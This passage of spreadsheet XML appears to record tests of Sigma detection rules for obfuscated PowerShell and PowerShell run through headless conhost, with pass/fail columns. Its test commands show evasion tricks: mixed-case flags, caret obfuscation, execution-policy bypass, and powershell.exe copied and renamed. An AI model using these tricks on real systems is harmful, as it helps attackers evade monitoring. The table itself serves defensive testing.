          <t>powershell.exe -cOMmAnd "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1467" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1467" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1467" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1467" s="36" t="n"/>
      <c r="J1467" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1467" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1468" ht="15.75" customHeight="1" s="42">
      <c r="A1468" s="43" t="n"/>
      <c r="B1468" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1468" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1468" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1468" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1468" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1468" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1468" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1468" s="36" t="n"/>
      <c r="J1468" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1468" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1469" ht="15.75" customHeight="1" s="42">
      <c r="A1469" s="43" t="n"/>
      <c r="B1469" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1469" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1469" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1469" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaND "Write-Host ([char]65)"</t>
        </is>
      </c>
      <c r="F1469" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1469" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1469" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1469" s="36" t="n"/>
      <c r="J1469" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1469" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1470" ht="15.75" customHeight="1" s="42">
      <c r="A1470" s="43" t="n"/>
      <c r="B1470" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1470" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1470" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1470" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1470" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1470" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1470" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1470" s="43" t="n"/>
      <c r="J1470" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1470" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1471" ht="15.75" customHeight="1" s="42">
      <c r="A1471" s="43" t="n"/>
      <c r="B1471" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1471" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1471" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1471" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1471" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1471" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1471" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1471" s="43" t="n"/>
      <c r="J1471" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1471" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1472" ht="15.75" customHeight="1" s="42">
      <c r="A1472" s="43" t="n"/>
      <c r="B1472" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1472" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1472" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1472" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1472" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1472" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1472" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1472" s="36" t="n"/>
      <c r="J1472" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1472" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1473" ht="15.75" customHeight="1" s="42">
      <c r="A1473" s="36" t="n"/>
      <c r="B1473" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1473" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1473" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1473" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1473" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1473" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1473" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1473" s="43" t="n"/>
      <c r="J1473" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1473" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1474" ht="15.75" customHeight="1" s="42">
      <c r="A1474" s="36" t="n"/>
      <c r="B1474" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_obfuscation_via_utf8</t>
        </is>
      </c>
      <c r="C1474" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via WCHAR/CHAR</t>
        </is>
      </c>
      <c r="D1474" s="36" t="inlineStr">
        <is>
          <t>e312efd0-35a1-407f-8439-b8d434b438a6</t>
        </is>
      </c>
      <c r="E1474" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAnD "Write-Host ([System.Char]0x41)"</t>
        </is>
      </c>
      <c r="F1474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1474" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1474" s="43" t="n"/>
      <c r="J1474" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1474" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1475" ht="15.75" customHeight="1" s="42">
      <c r="A1475" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1475" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1475" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1475" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1475" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F1475" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1475" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1475" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1475" s="36" t="n"/>
      <c r="J1475" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1475" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1476" ht="15.75" customHeight="1" s="42">
      <c r="A1476" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1476" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1476" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1476" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1476" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1476" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1476" s="36" t="n"/>
      <c r="J1476" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1476" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1477" ht="15.75" customHeight="1" s="42">
      <c r="A1477" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1477" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1477" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1477" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1477" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1477" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1477" s="36" t="n"/>
      <c r="J1477" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1477" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1478" ht="15.75" customHeight="1" s="42">
      <c r="A1478" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1478" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1478" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1478" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1478" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1478" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1478" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1478" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1478" s="36" t="n"/>
      <c r="J1478" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1478" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1479" ht="15.75" customHeight="1" s="42">
      <c r="A1479" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1479" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1479" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1479" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1479" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1479" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1479" s="43" t="n"/>
      <c r="J1479" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1479" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1480" ht="15.75" customHeight="1" s="42">
      <c r="A1480" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1480" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1480" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1480" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1480" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1480" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1480" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1480" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1480" s="43" t="n"/>
      <c r="J1480" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1480" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1481" ht="15.75" customHeight="1" s="42">
      <c r="A1481" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1481" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1481" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1481" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1481" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1481" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1481" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1481" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1481" s="43" t="n"/>
      <c r="J1481" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1481" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1482" ht="15.75" customHeight="1" s="42">
      <c r="A1482" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1482" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1482" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1482" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1482" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1482" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1482" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1482" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1482" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1482" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1483" ht="15.75" customHeight="1" s="42">
      <c r="A1483" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1483" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1483" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1483" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1483" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F1483" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1483" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1483" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1483" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1483" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1483" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1484" ht="15.75" customHeight="1" s="42">
      <c r="A1484" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1484" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1484" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1484" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1484" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F1484" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1484" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1484" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1484" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1484" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1484" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1485" ht="15.75" customHeight="1" s="42">
      <c r="A1485" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1485" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1485" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1485" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1485" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1485" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1485" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1485" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1485" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1485" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1485" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1486" ht="15.75" customHeight="1" s="42">
      <c r="A1486" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1486" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1486" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1486" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1486" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F1486" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1486" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1486" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1486" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1486" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1486" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1487" ht="15.75" customHeight="1" s="42">
      <c r="A1487" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1487" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1487" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1487" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1487" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F1487" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1487" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1487" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1487" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1487" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1487" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1488" ht="15.75" customHeight="1" s="42">
      <c r="A1488" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1488" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1488" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1488" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1488" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1488" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1488" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1488" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1488" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1488" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1488" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1489" ht="15.75" customHeight="1" s="42">
      <c r="A1489" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1489" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1489" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1489" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1489" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F1489" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1489" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1489" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1489" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1489" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1489" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1490" ht="15.75" customHeight="1" s="42">
      <c r="A1490" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1490" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1490" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1490" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1490" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F1490" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1490" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1490" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1490" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1490" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1490" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1491" ht="15.75" customHeight="1" s="42">
      <c r="A1491" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1491" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1491" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1491" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1491" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F1491" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1491" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1491" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1491" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1491" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1491" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1492" ht="15.75" customHeight="1" s="42">
      <c r="A1492" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1492" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1492" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1492" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1492" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1492" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1492" s="36" t="n"/>
      <c r="J1492" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1492" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1493" ht="15.75" customHeight="1" s="42">
      <c r="A1493" s="36" t="inlineStr">
        <is>
          <t>t1059.003</t>
        </is>
      </c>
      <c r="B1493" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1493" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
